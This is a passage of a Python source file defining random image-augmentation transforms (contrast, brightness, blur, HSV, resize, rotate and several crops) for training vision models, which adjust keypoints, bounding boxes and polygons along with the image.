0, 1), (2, 1, 0))\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n img_mode = img.mode\n swap = self.perms[random.randint(0, len(self.perms)-1)]\n img = np.asarray(img)\n img = img[:, :, swap]\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass 
RandomContrast(object):\n def __init__(self, lower=0.5, upper=1.5, ratio=0.5):\n self.lower = lower\n self.upper = upper\n self.ratio = ratio\n assert self.upper >= self.lower, \"contrast upper must be >= lower.\"\n assert self.lower >= 0, \"contrast lower must be non-negative.\"\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n img_mode = img.mode\n img = np.array(img).astype(np.float32)\n img *= random.uniform(self.lower, self.upper)\n img = np.clip(img, 0, 255)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomBrightness(object):\n def __init__(self, shift_value=30, ratio=0.5):\n self.shift_value = shift_value\n self.ratio = ratio\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n img_mode = img.mode\n shift = np.random.uniform(-self.shift_value, self.shift_value, size=1)\n img = np.asarray(img).astype(np.float32)\n img[:, :, :] += shift\n img = np.around(img)\n img = np.clip(img, 0, 255)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomGaussBlur(object):\n def __init__(self, max_blur=4, ratio=0.5):\n self.max_blur = max_blur\n self.ratio = ratio\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n blur_value = np.random.uniform(0, self.max_blur)\n img = img.filter(ImageFilter.GaussianBlur(radius=blur_value))\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomHSV(object):\n \"\"\"\n Args:\n h_range (float tuple): random ratio of the hue channel,\n new_h range from h_range[0]*old_h to h_range[1]*old_h.\n s_range (float tuple): random ratio of the saturation channel,\n new_s range from s_range[0]*old_s to s_range[1]*old_s.\n v_range (int tuple): random bias of the value channel,\n new_v range from old_v-v_range to old_v+v_range.\n Notice:\n h range: 0-1\n s range: 0-1\n v range: 0-255\n \"\"\"\n def __init__(self, h_range, s_range, v_range, ratio=0.5):\n assert isinstance(h_range, (list, tuple)) and \\\n isinstance(s_range, (list, tuple)) and \\\n isinstance(v_range, (list, tuple))\n self.h_range = h_range\n self.s_range = s_range\n self.v_range = v_range\n self.ratio = ratio\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, 
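A condensed sketch of the photometric-jitter pattern shared by `RandomContrast` and `RandomBrightness` above (PIL image to float array, perturb, clip to [0, 255], back to PIL); the helper function and its parameter values are illustrative:

```python
import random
import numpy as np
from PIL import Image

def jitter(img, contrast=(0.5, 1.5), shift=30):
    arr = np.asarray(img).astype(np.float32)
    arr *= random.uniform(*contrast)         # contrast: multiplicative
    arr += np.random.uniform(-shift, shift)  # brightness: additive
    return Image.fromarray(np.clip(arr, 0, 255).astype(np.uint8), mode=img.mode)

img = Image.new('RGB', (8, 8), (128, 128, 128))
out = jitter(img)  # same size, randomly brightened and contrast-scaled
```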
labels, polygons\n\n img_mode = img.mode\n img = np.asarray(img)\n img_hsv = matplotlib.colors.rgb_to_hsv(img)\n img_h, img_s, img_v = img_hsv[:, :, 0], img_hsv[:, :, 1], img_hsv[:, :, 2]\n h_random = np.random.uniform(min(self.h_range), max(self.h_range))\n s_random = np.random.uniform(min(self.s_range), max(self.s_range))\n v_random = np.random.uniform(min(self.v_range), max(self.v_range))\n img_h = np.clip(img_h * h_random, 0, 1)\n img_s = np.clip(img_s * s_random, 0, 1)\n img_v = np.clip(img_v * v_random, 0, 255)\n img_hsv = np.stack([img_h, img_s, img_v], axis=2)\n img = matplotlib.colors.hsv_to_rgb(img_hsv)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomResizedCrop(object):\n \"\"\"Crop the given PIL Image to random size and aspect ratio.\n\n A crop of random size (default: of 0.08 to 1.0) of the original size and a random\n aspect ratio (default: of 3/4 to 4/3) of the original aspect ratio is made. This crop\n is finally resized to given size.\n This is popularly used to train the Inception networks.\n\n Args:\n size: expected output size of each edge\n scale: range of size of the origin size cropped\n ratio: range of aspect ratio of the origin aspect ratio cropped\n interpolation: Default: PIL.Image.BILINEAR\n \"\"\"\n def __init__(self, crop_size, scale_range=(0.08, 1.0), aspect_range=(3. / 4., 4. / 3.)):\n self.size = crop_size\n self.scale = scale_range\n self.ratio = aspect_range\n\n @staticmethod\n def get_params(img, scale, ratio):\n \"\"\"Get parameters for ``crop`` for a random sized crop.\n\n Args:\n img (PIL Image): Image to be cropped.\n scale (tuple): range of size of the origin size cropped\n ratio (tuple): range of aspect ratio of the origin aspect ratio cropped\n\n Returns:\n tuple: params (i, j, h, w) to be passed to ``crop`` for a random\n sized crop.\n \"\"\"\n for attempt in range(10):\n area = img.size[0] * img.size[1]\n target_area = random.uniform(*scale) * area\n aspect_ratio = random.uniform(*ratio)\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if random.random() < 0.5:\n w, h = h, w\n\n if w <= img.size[0] and h <= img.size[1]:\n i = random.randint(0, img.size[1] - h)\n j = random.randint(0, img.size[0] - w)\n return i, j, h, w\n\n # Fallback\n w = min(img.size[0], img.size[1])\n i = (img.size[1] - w) // 2\n j = (img.size[0] - w) // 2\n return i, j, w, w\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n \"\"\"\n Args:\n img (PIL Image): Image to be cropped and resized.\n\n Returns:\n PIL Image: Randomly cropped and resized image.\n \"\"\"\n assert isinstance(img, Image.Image)\n assert labelmap is None and maskmap is None and kpts is None and bboxes is None and labels is None\n i, j, h, w = self.get_params(img, self.scale, self.ratio)\n img = img.crop((j, i, j + w, i + h))\n img = img.resize(self.size, Image.BILINEAR)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomResize(object):\n \"\"\"Resize the given numpy.ndarray to random size and aspect ratio.\n\n Args:\n scale_min: the min scale to resize.\n scale_max: the max scale to resize.\n \"\"\"\n\n def __init__(self, scale_range=(0.75, 1.25), aspect_range=(0.9, 1.1),\n target_size=None, resize_bound=None, method='random', ratio=0.5):\n self.scale_range = scale_range\n self.aspect_range = aspect_range\n self.resize_bound = resize_bound\n self.method = 
method\n self.ratio = ratio\n if target_size is not None:\n if isinstance(target_size, int):\n self.input_size = (target_size, target_size)\n elif isinstance(target_size, (list, tuple)) and len(target_size) == 2:\n self.input_size = target_size\n else:\n raise TypeError('Got inappropriate size arg: {}'.format(target_size))\n else:\n self.input_size = None\n\n def get_scale(self, img_size, bboxes):\n if self.method == 'random':\n scale_ratio = random.uniform(self.scale_range[0], self.scale_range[1])\n return scale_ratio\n\n elif self.method == 'focus':\n if self.input_size is not None and bboxes is not None and len(bboxes) > 0:\n bboxes = np.array(bboxes)\n border = bboxes[:, 2:] - bboxes[:, 0:2]\n scale = 0.6 / max(max(border[:, 0]) / self.input_size[0], max(border[:, 1]) / self.input_size[1])\n scale_ratio = random.uniform(self.scale_range[0], self.scale_range[1]) * scale\n return scale_ratio\n\n else:\n scale_ratio = random.uniform(self.scale_range[0], self.scale_range[1])\n return scale_ratio\n\n elif self.method == 'bound':\n scale1 = self.resize_bound[0] / min(img_size)\n scale2 = self.resize_bound[1] / max(img_size)\n scale = min(scale1, scale2)\n return scale\n\n else:\n raise NotImplementedError('Resize method {} undefined!'.format(self.method))\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n \"\"\"\n Args:\n img (Image): Image to be resized.\n maskmap (Image): Mask to be resized.\n kpt (list): keypoints to be resized.\n center: (list): center points to be resized.\n\n Returns:\n Image: Randomly resize image.\n Image: Randomly resize maskmap.\n list: Randomly resize keypoints.\n list: Randomly resize center points.\n \"\"\"\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n\n # width, height = img.size\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n if random.random() < self.ratio:\n scale_ratio = self.get_scale([width, height], bboxes)\n aspect_ratio = random.uniform(*self.aspect_range)\n w_scale_ratio = math.sqrt(aspect_ratio) * scale_ratio\n h_scale_ratio = math.sqrt(1.0 / aspect_ratio) * scale_ratio\n else:\n w_scale_ratio, h_scale_ratio = 1.0, 1.0\n\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] *= w_scale_ratio\n kpts[:, :, 1] *= h_scale_ratio\n\n if bboxes is not None and bboxes.size > 0:\n bboxes[:, 0::2] *= w_scale_ratio\n bboxes[:, 1::2] *= h_scale_ratio\n\n if polygons is not None:\n for object_id in range(len(polygons)):\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] *= w_scale_ratio\n polygons[object_id][polygon_id][1::2] *= h_scale_ratio\n\n converted_size = (int(width * w_scale_ratio), int(height * h_scale_ratio))\n\n if not isinstance(img, list):\n img = img.resize(converted_size, Image.BILINEAR)\n else:\n img = [item.resize(converted_size, Image.BILINEAR) for item in img]\n if labelmap is not None:\n labelmap = labelmap.resize(converted_size, Image.NEAREST)\n if maskmap is not None:\n maskmap = maskmap.resize(converted_size, Image.NEAREST)\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomRotate(object):\n \"\"\"Rotate the input numpy.ndarray and points to the given degree.\n\n Args:\n degree (number): Desired rotate degree.\n \"\"\"\n def __init__(self, max_degree, ratio=0.5, mean=(104, 117, 123)):\n assert isinstance(max_degree, int)\n self.max_degree = 
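A worked instance of the scale/aspect factoring in `RandomResize.__call__` above: the area scale and the aspect ratio are sampled independently, then split into per-axis ratios whose product recovers the squared scale:

```python
import math

scale_ratio, aspect_ratio = 1.2, 1.1
w_scale = math.sqrt(aspect_ratio) * scale_ratio        # ~1.2586
h_scale = math.sqrt(1.0 / aspect_ratio) * scale_ratio  # ~1.1442

width, height = 640, 480
converted = (int(width * w_scale), int(height * h_scale))  # (805, 549)
assert abs(w_scale * h_scale - scale_ratio ** 2) < 1e-9
```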
max_degree\n self.ratio = ratio\n self.mean = tuple(mean)\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n \"\"\"\n Args:\n img (Image): Image to be rotated.\n maskmap (Image): Mask to be rotated.\n kpt (np.array): Keypoints to be rotated.\n center (list): Center points to be rotated.\n\n Returns:\n Image: Rotated image.\n list: Rotated key points.\n \"\"\"\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() < self.ratio:\n rotate_degree = random.uniform(-self.max_degree, self.max_degree)\n else:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n img_center = (width / 2.0, height / 2.0)\n rotate_mat = cv2.getRotationMatrix2D(img_center, rotate_degree, 1.0)\n cos_val = np.abs(rotate_mat[0, 0])\n sin_val = np.abs(rotate_mat[0, 1])\n new_width = int(height * sin_val + width * cos_val)\n new_height = int(height * cos_val + width * sin_val)\n rotate_mat[0, 2] += (new_width / 2.) - img_center[0]\n rotate_mat[1, 2] += (new_height / 2.) - img_center[1]\n if not isinstance(img, list):\n img_mode = img.mode\n img = np.asarray(img)\n img = cv2.warpAffine(img, rotate_mat, (new_width, new_height), borderValue=self.mean)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n else:\n for i in range(len(img)):\n img_mode = img[i].mode\n img_i = np.array(img[i])\n img_i = cv2.warpAffine(img_i, rotate_mat, (new_width, new_height), borderValue=self.mean)\n img[i] = Image.fromarray(img_i.astype(np.uint8), mode=img_mode)\n\n if labelmap is not None:\n labelmap_mode = labelmap.mode\n labelmap = np.asarray(labelmap)\n labelmap = cv2.warpAffine(labelmap, rotate_mat, (new_width, new_height),\n borderValue=(255, 255, 255), flags=cv2.INTER_NEAREST)\n labelmap = Image.fromarray(labelmap.astype(np.uint8), mode=labelmap_mode)\n\n if maskmap is not None:\n maskmap_mode = maskmap.mode\n maskmap = np.asarray(maskmap)\n maskmap = cv2.warpAffine(maskmap, rotate_mat, (new_width, new_height),\n borderValue=(1, 1, 1), flags=cv2.INTER_NEAREST)\n maskmap = Image.fromarray(maskmap.astype(np.uint8), mode=maskmap_mode)\n\n if polygons is not None:\n for object_id in range(len(polygons)):\n for polygon_id in range(len(polygons[object_id])):\n for i in range(len(polygons[object_id][polygon_id]) // 2):\n x = polygons[object_id][polygon_id][i * 2]\n y = polygons[object_id][polygon_id][i * 2 + 1]\n p = np.array([x, y, 1])\n p = rotate_mat.dot(p)\n polygons[object_id][polygon_id][i * 2] = p[0]\n polygons[object_id][polygon_id][i * 2 + 1] = p[1]\n\n if kpts is not None and kpts.size > 0:\n num_objects = len(kpts)\n num_keypoints = len(kpts[0])\n for i in range(num_objects):\n for j in range(num_keypoints):\n x = kpts[i][j][0]\n y = kpts[i][j][1]\n p = np.array([x, y, 1])\n p = rotate_mat.dot(p)\n kpts[i][j][0] = p[0]\n kpts[i][j][1] = p[1]\n\n # It is not right for object detection tasks.\n if bboxes is not None and bboxes.size > 0:\n for i in range(len(bboxes)):\n bbox_temp = [bboxes[i][0], bboxes[i][1], bboxes[i][2], bboxes[i][1],\n bboxes[i][0], bboxes[i][3], bboxes[i][2], bboxes[i][3]]\n\n for node in range(4):\n x = bbox_temp[node * 2]\n y = bbox_temp[node * 2 + 1]\n p = np.array([x, y, 1])\n p = rotate_mat.dot(p)\n bbox_temp[node * 2] = p[0]\n bbox_temp[node * 2 + 1] = p[1]\n\n bboxes[i] = [min(bbox_temp[0], bbox_temp[2], bbox_temp[4], 
bbox_temp[6]),\n min(bbox_temp[1], bbox_temp[3], bbox_temp[5], bbox_temp[7]),\n max(bbox_temp[0], bbox_temp[2], bbox_temp[4], bbox_temp[6]),\n max(bbox_temp[1], bbox_temp[3], bbox_temp[5], bbox_temp[7])]\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomCrop(object):\n \"\"\"Crop the given numpy.ndarray and at a random location.\n\n Args:\n size (int or tuple): Desired output size of the crop.(w, h)\n \"\"\"\n def __init__(self, crop_size, ratio=0.5, method='focus', grid=None, allow_outside_center=True):\n self.ratio = ratio\n self.method = method\n self.grid = grid\n self.allow_outside_center = allow_outside_center\n if isinstance(crop_size, float):\n self.size = (crop_size, crop_size)\n elif isinstance(crop_size, collections.Iterable) and len(crop_size) == 2:\n self.size = crop_size\n else:\n raise TypeError('Got inappropriate size arg: {}'.format(crop_size))\n\n def get_lefttop(self, crop_size, img_size):\n if self.method == 'center':\n return [(img_size[0] - crop_size[0]) // 2, (img_size[1] - crop_size[1]) // 2]\n\n elif self.method == 'random':\n x = random.randint(0, img_size[0] - crop_size[0])\n y = random.randint(0, img_size[1] - crop_size[1])\n return [x, y]\n\n elif self.method == 'grid':\n grid_x = random.randint(0, self.grid[0] - 1)\n grid_y = random.randint(0, self.grid[1] - 1)\n x = grid_x * ((img_size[0] - crop_size[0]) // (self.grid[0] - 1))\n y = grid_y * ((img_size[1] - crop_size[1]) // (self.grid[1] - 1))\n return [x, y]\n\n else:\n raise NotImplementedError('Random Crop Method {} Undefined!'.format(self.method))\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n \"\"\"\n Args:\n img (Image): Image to be cropped.\n maskmap (Image): Mask to be cropped.\n kpts (np.array): keypoints to be cropped.\n bboxes (np.array): bounding boxes.\n\n Returns:\n Image: Cropped image.\n Image: Cropped maskmap.\n np.array: Cropped keypoints.\n np.ndarray: Cropped center points.\n \"\"\"\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n target_size = [min(self.size[0], width), min(self.size[1], height)]\n offset_left, offset_up = self.get_lefttop(target_size, [width, height])\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] -= offset_left\n kpts[:, :, 1] -= offset_up\n\n if bboxes is not None and bboxes.size > 0:\n if self.allow_outside_center:\n mask = np.ones(bboxes.shape[0], dtype=bool)\n else:\n crop_bb = np.array([offset_left, offset_up, offset_left + target_size[0], offset_up + target_size[1]])\n center = (bboxes[:, :2] + bboxes[:, 2:]) / 2\n mask = np.logical_and(crop_bb[:2] <= center, center < crop_bb[2:]).all(axis=1)\n\n bboxes[:, 0::2] -= offset_left\n bboxes[:, 1::2] -= offset_up\n bboxes[:, 0::2] = np.clip(bboxes[:, 0::2], 0, target_size[0] - 1)\n bboxes[:, 1::2] = np.clip(bboxes[:, 1::2], 0, target_size[1] - 1)\n\n mask = np.logical_and(mask, (bboxes[:, :2] < bboxes[:, 2:]).all(axis=1))\n bboxes = bboxes[mask]\n if labels is not None:\n labels = labels[mask]\n\n if polygons is not None:\n new_polygons = list()\n for object_id in range(len(polygons)):\n if mask[object_id] == 1:\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] -= offset_left\n 
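A standalone check of the expanded-canvas rotation used by `RandomRotate` above: the output size is grown so no corner is cut off, and the matrix translation is shifted so the old image centre maps to the new one (toy sizes, same cv2 calls):

```python
import cv2
import numpy as np

w, h, degree = 200, 100, 30
M = cv2.getRotationMatrix2D((w / 2.0, h / 2.0), degree, 1.0)
cos_v, sin_v = abs(M[0, 0]), abs(M[0, 1])
new_w = int(h * sin_v + w * cos_v)   # 223
new_h = int(h * cos_v + w * sin_v)   # 186
M[0, 2] += new_w / 2. - w / 2.
M[1, 2] += new_h / 2. - h / 2.

# A point transforms as p' = M @ [x, y, 1]; the old centre lands on the new centre.
centre = M.dot(np.array([w / 2.0, h / 2.0, 1.0]))
assert np.allclose(centre, [new_w / 2., new_h / 2.])
```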
polygons[object_id][polygon_id][1::2] -= offset_up\n polygons[object_id][polygon_id][0::2] = np.clip(polygons[object_id][polygon_id][0::2],\n 0, target_size[0] - 1)\n polygons[object_id][polygon_id][1::2] = np.clip(polygons[object_id][polygon_id][1::2],\n 0, target_size[1] - 1)\n\n new_polygons.append(polygons[object_id])\n\n polygons = new_polygons\n\n if not isinstance(img, list):\n img = img.crop((offset_left, offset_up, offset_left + target_size[0], offset_up + target_size[1]))\n else:\n img = [item.crop((offset_left, offset_up,\n offset_left + target_size[0], offset_up + target_size[1])) for item in img]\n\n if maskmap is not None:\n maskmap = maskmap.crop((offset_left, offset_up, offset_left + target_size[0], offset_up + target_size[1]))\n\n if labelmap is not None:\n labelmap = labelmap.crop((offset_left, offset_up, offset_left + target_size[0], offset_up + target_size[1]))\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomFocusCrop(object):\n \"\"\"Crop the given numpy.ndarray and at a random location.\n\n Args:\n size (int or tuple): Desired output size of the crop.(w, h)\n \"\"\"\n def __init__(self, crop_size, ratio=0.5, center_jitter=None, mean=(104, 117, 123), allow_outside_center=True):\n self.ratio = ratio\n self.center_jitter = center_jitter\n self.mean = mean\n self.allow_outside_center = allow_outside_center\n if isinstance(crop_size, float):\n self.size = (crop_size, crop_size)\n elif isinstance(crop_size, collections.Iterable) and len(crop_size) == 2:\n self.size = crop_size\n else:\n raise TypeError('Got inappropriate size arg: {}'.format(crop_size))\n\n def get_center(self, img_size, bboxes):\n if bboxes is None or len(bboxes) == 0:\n if img_size[0] > self.size[0]:\n x = random.randint(self.size[0] // 2, img_size[0] - self.size[0] // 2)\n else:\n x = img_size[0] // 2\n\n if img_size[1] > self.size[1]:\n y = random.randint(self.size[1] // 2, img_size[1] - self.size[1] // 2)\n else:\n y = img_size[1] // 2\n\n return [x, y], -1\n\n else:\n border = bboxes[:, 2:] - bboxes[:, 0:2]\n area = border[:, 0] * border[:, 1]\n max_index = np.argmax(area)\n max_center = [(bboxes[max_index][0] + bboxes[max_index][2]) / 2,\n (bboxes[max_index][1] + bboxes[max_index][3]) / 2]\n\n if self.center_jitter is not None:\n jitter = random.randint(-self.center_jitter, self.center_jitter)\n max_center[0] += jitter\n jitter = random.randint(-self.center_jitter, self.center_jitter)\n max_center[1] += jitter\n\n return max_center, max_index\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n \"\"\"\n Args:\n img (Image): Image to be cropped.\n maskmap (Image): Mask to be cropped.\n kpts (np.array): keypoints to be cropped.\n bboxes (np.array): bounding boxes.\n\n Returns:\n Image: Cropped image.\n Image: Cropped maskmap.\n list: Cropped keypoints.\n list: Cropped center points.\n \"\"\"\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n center, index = self.get_center(img.size, bboxes)\n offset_left = int(center[0] - self.size[0] // 2)\n offset_up = int(center[1] - self.size[1] // 2)\n\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] -= offset_left\n kpts[:, :, 1] -= offset_up\n mask = np.logical_or.reduce((kpts[:, :, 0] >= self.size[0], kpts[:, :, 0] < 0,\n kpts[:, :, 1] >= 
self.size[1], kpts[:, :, 1] < 0))\n kpts[mask == 1, 2] = -1\n\n if bboxes is not None and bboxes.size > 0:\n if self.allow_outside_center:\n mask = np.ones(bboxes.shape[0], dtype=bool)\n else:\n crop_bb = np.array([offset_left, offset_up, offset_left + self.size[0], offset_up + self.size[1]])\n center = (bboxes[:, :2] + bboxes[:, 2:]) / 2\n mask = np.logical_and(crop_bb[:2] <= center, center < crop_bb[2:]).all(axis=1)\n\n bboxes[:, 0::2] -= offset_left\n bboxes[:, 1::2] -= offset_up\n bboxes[:, 0::2] = np.clip(bboxes[:, 0::2], 0, self.size[0] - 1)\n bboxes[:, 1::2] = np.clip(bboxes[:, 1::2], 0, self.size[1] - 1)\n\n mask = np.logical_and(mask, (bboxes[:, :2] < bboxes[:, 2:]).all(axis=1))\n bboxes = bboxes[mask]\n if labels is not None:\n labels = labels[mask]\n\n if polygons is not None:\n new_polygons = list()\n for object_id in range(len(polygons)):\n if mask[object_id] == 1:\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] -= offset_left\n polygons[object_id][polygon_id][1::2] -= offset_up\n polygons[object_id][polygon_id][0::2] = np.clip(polygons[object_id][polygon_id][0::2],\n 0, self.size[0] - 1)\n polygons[object_id][polygon_id][1::2] = np.clip(polygons[object_id][polygon_id][1::2],\n 0, self.size[1] - 1)\n\n new_polygons.append(polygons[object_id])\n\n polygons = new_polygons\n\n w, h = img.size\n img = ImageOps.expand(img,\n border=(-offset_left, -offset_up,\n self.size[0] + offset_left - w, self.size[1] + offset_up - h),\n fill=tuple(self.mean))\n img = img.crop((0, 0, self.size[0], self.size[1]))\n\n if maskmap is not None:\n maskmap = ImageOps.expand(maskmap,\n border=(-offset_left, -offset_up,\n self.size[0] + offset_left - w, self.size[1] + offset_up - h), fill=1)\n maskmap = maskmap.crop((0, 0, self.size[0], self.size[1]))\n\n if labelmap is not None:\n labelmap = ImageOps.expand(labelmap, border=(-offset_left, -offset_up,\n self.size[0] + offset_left - w,\n self.size[1] + offset_up - h), fill=255)\n labelmap = labelmap.crop((0, 0, self.size[0], self.size[1]))\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomDetCrop(object):\n \"\"\"Crop\n Arguments:\n img (Image): the image being input during training\n boxes (Tensor): the original bounding boxes in pt form\n labels (Tensor): the class labels for each bbox\n mode (float tuple): the min and max jaccard overlaps\n Return:\n (img, boxes, classes)\n img (Image): the cropped image\n boxes (Tensor): the adjusted bounding boxes in pt form\n labels (Tensor): the class labels for each bbox\n \"\"\"\n def __init__(self, ratio=0.5):\n self.ratio = ratio\n self.sample_options = (\n # using entire original input image\n None,\n # sample a patch s.t. MIN jaccard w/ obj in .1,.3,.4,.7,.9\n (0.1, None),\n (0.3, None),\n (0.5, None),\n (0.7, None),\n (0.9, None),\n # randomly sample a patch\n (None, None),\n )\n\n @staticmethod\n def intersect(box_a, box_b):\n max_xy = np.minimum(box_a[:, 2:], box_b[2:])\n min_xy = np.maximum(box_a[:, :2], box_b[:2])\n inter = np.clip((max_xy - min_xy), a_min=0, a_max=np.inf)\n return inter[:, 0] * inter[:, 1]\n\n @staticmethod\n def jaccard_numpy(box_a, box_b):\n \"\"\"Compute the jaccard overlap of two sets of boxes. 
The jaccard overlap\n is simply the intersection over union of two boxes.\n E.g.:\n A ∩ B / A ∪ B = A ∩ B / (area(A) + area(B) - A ∩ B)\n Args:\n box_a: Multiple bounding boxes, Shape: [num_boxes,4]\n box_b: Single bounding box, Shape: [4]\n Return:\n jaccard overlap: Shape: [box_a.shape[0]]\n \"\"\"\n inter = RandomDetCrop.intersect(box_a, box_b)\n area_a = ((box_a[:, 2] - box_a[:, 0]) *\n (box_a[:, 3] - box_a[:, 1])) # [A,B]\n area_b = ((box_b[2] - box_b[0]) *\n (box_b[3] - box_b[1])) # [A,B]\n union = area_a + area_b - inter\n return inter / union # [A,B]\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None and maskmap is None and kpts is None and polygons is None\n assert bboxes is not None and labels is not None\n\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size\n while True:\n # randomly choose a mode\n mode = random.choice(self.sample_options)\n if mode is None or bboxes.size == 0:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n min_iou, max_iou = mode\n if min_iou is None:\n min_iou = float('-inf')\n if max_iou is None:\n max_iou = float('inf')\n\n # max trials (50)\n for _ in range(50):\n scale = random.uniform(0.3, 1.)\n min_ratio = max(0.5, scale * scale)\n max_ratio = min(2.0, 1. / scale / scale)\n ratio = math.sqrt(random.uniform(min_ratio, max_ratio))\n w = int(scale * ratio * width)\n h = int((scale / ratio) * height)\n left = random.randint(0, width - w)\n top = random.randint(0, height - h)\n # convert to integer rect x1,y1,x2,y2\n rect = np.array([int(left), int(top), int(left+w), int(top+h)])\n # calculate IoU (jaccard overlap) b/t the cropped and gt boxes\n overlap = self.jaccard_numpy(bboxes, rect)\n # is min and max overlap constraint satisfied? if not try again\n if overlap.min() < min_iou or max_iou < overlap.max():\n continue\n\n # keep overlap with gt box IF center in sampled patch\n centers = (bboxes[:, :2] + bboxes[:, 2:]) / 2.0\n # mask in all gt boxes that are above and to the left of centers\n m1 = (rect[0] < centers[:, 0]) * (rect[1] < centers[:, 1])\n # mask in all gt boxes that are under and to the right of centers\n m2 = (rect[2] > centers[:, 0]) * (rect[3] > centers[:, 1])\n # mask in boxes where both m1 and m2 are true\n mask = m1 * m2\n # have any valid boxes? 
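A hand-checked instance of `jaccard_numpy` above (one ground-truth box against one sampled rect, assuming the `RandomDetCrop` class is in scope):

```python
import numpy as np

box_a = np.array([[0., 0., 10., 10.]])  # area 100
rect = np.array([5., 5., 15., 15.])     # area 100, overlap 5x5 = 25
iou = RandomDetCrop.jaccard_numpy(box_a, rect)
# inter = 25, union = 100 + 100 - 25 = 175 -> IoU = 25/175 ≈ 0.1429
assert np.isclose(iou[0], 25. / 175.)
```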
